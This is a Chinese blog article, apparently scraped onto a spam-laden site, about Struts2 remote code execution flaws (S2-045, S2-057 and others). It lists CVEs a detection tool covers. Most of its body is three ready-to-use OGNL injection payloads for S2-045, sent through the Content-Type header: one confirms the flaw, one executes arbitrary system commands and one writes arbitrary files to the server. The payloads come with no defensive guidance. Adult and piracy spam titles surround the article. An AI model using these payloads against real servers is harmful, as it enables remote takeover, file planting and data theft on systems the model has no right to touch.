在线精品99_中国九九盗摄偷拍偷看_91免费版在线观看_91.app_91高清视频在线_99热最新网站

Struts2漏洞怎么利用工具检查

175次阅读
没有评论

共计 3309 个字符,预计需要花费 9 分钟才能阅读完成。

今天丸趣 TV 小编给大家分享一下 Struts2 漏洞怎么利用工具检查的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。

Struts2 是一个基于 MVC 设计模式的 Web 应用框架,但 2 存在远程代码执行的漏洞,动力节点丸趣 TV 小编认为,检测出漏洞就要进行 Struts2 漏洞修复,现在 Struts2 漏洞检测工具 2017 版增加 S2-046,官方发布 S2-046 和 S2-045 漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046 方式可能绕过部分 WAF 防护,存在 S2-045 就存在 S2-046。

当 Struts2 开启 devMode 模式时,将导致严重远程代码执行漏洞。如果 WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。

支持 S2-057 CVE-2018-11776、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、S2-032 CVE-2016-3081、S2-020 CVE-2014-0094、S2-019 CVE-2013-4316 等漏洞检测!

Apache Struts2 存在远程代码执行的高危漏洞 (S2-057/CVE-2018-11776),该漏洞由 Semmle Security Research team 的安全研究员 Man YueMo 发现。该漏洞是由于在 Struts2 开发框架中使用 namespace 功能定义 XML 配置时,namespace 值未被设置且在上层动作配置(Action Configuration) 中未设置或用通配符 namespace,可能导致远程代码执行。同理,url 标签未设置 value 和 action 值且上层动作未设置或用通配符 namespace 时也可能导致远程代码执行!

相关 exp:

S2-045:

1. 验证漏洞,修改 Content-Type,返回内容为“webpath”代表存在漏洞。

%{(#test= multipart/form-data).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context[ com.opensymphony.xwork2.ActionContext.container]).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType( text/html;charset=UTF-8)).(#res.getWriter().print(web)).
(#res.getWriter().print(path)).(#res.getWriter().flush()).(#res.getWriter().close())}

2. 执行命令

%{(#test= multipart/form-data).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context[ com.opensymphony.xwork2.ActionContext.container]).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType( text/html;charset=UTF-8)).(#s=new java.util.Scanner((new
java.lang.ProcessBuilder([cmd] .toString().split( s))).start().getInputStream()).useDelimiter(AAAA)).
(#str=#s.hasNext()?#s.next():).(#res.getWriter().print(#str)).(#res.getWriter().flush()).
(#res.getWriter().close()).(#s.close())}

3. 上传文件:

%{(#test= multipart/form-data).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context[ com.opensymphony.xwork2.ActionContext.container]).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).
(#res=@org.apache.struts2.ServletActionContext@getResponse()).
(#res.setContentType( text/html;charset=UTF-8)).(new java.io.BufferedWriter(new
java.io.FileWriter([path])).append(#req.getHeader( test)).close()).(#res.getWriter().print(oko)).
(#res.getWriter().print(kok/)).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).
(#res.getWriter().close())}

以上就是“Struts2 漏洞怎么利用工具检查”这篇文章的所有内容,感谢各位的阅读!相信大家阅读完这篇文章都有很大的收获,丸趣 TV 小编每天都会为大家更新不同的知识,如果还想学习更多的知识,请关注丸趣 TV 行业资讯频道。

正文完
 
丸趣
版权声明:本站原创文章,由 丸趣 2023-07-18发表,共计3309字。
转载说明:除特殊说明外本站除技术相关以外文章皆由网络搜集发布,转载请注明出处。
评论(没有评论)
主站蜘蛛池模板: 亚洲欧美日本视频 | 亚洲欧美日本a∨在线观看 亚洲欧美日本国产 | 亚洲乱色熟女一区二区三区麻豆 | 妺妺窝人体色www在线 | 91麻豆视频 | 午夜天堂精品久久久久 | 婷婷五月综合缴情在线视频 | 国产一级片在线 | 大香人蕉免费视频75 | 久久久久久久99精品国产片 | 一本大道无码日韩精品影视_ | 亚洲国产成人精品无码区在线观看 | 麻豆亚洲av成人无码久久精品 | 十级毛片| 成人福利视频在线看高清观看 | 91亚洲国产成人久久精品网址 | 你懂的在线观看网址 | 中文字幕乱码在线观看 | 全部免费的毛片在线看青青 | 久久精品免费一区二区三区 | 亚洲午夜精品专区国产 | 久久婷婷五月综合色奶水99啪 | 台湾佬中文娱乐22vvvv | 国产精品视频免费看 | 鲁大师在线视频播放免费观看 | 超清精品丝袜国产自在线拍 | 尤物在线观看 | 99久9在线视频| 久久精品视频5 | www黄色免费 | 四虎网站在线观看 | 久久综合av色老头免费观看 | 免费a级毛片无码a∨免费软件 | 精品国产_亚洲人成在线高清 | 在线观看的黄网 | 国产在线aaa片一区二区99 | 国产一在线精品一区在线观看 | 无码人妻丰满熟妇区五十路百度 | 午夜看片网站 | 久久久噜噜噜久久中文字幕色伊伊 | 99国产精品久久久久久久日本竹 |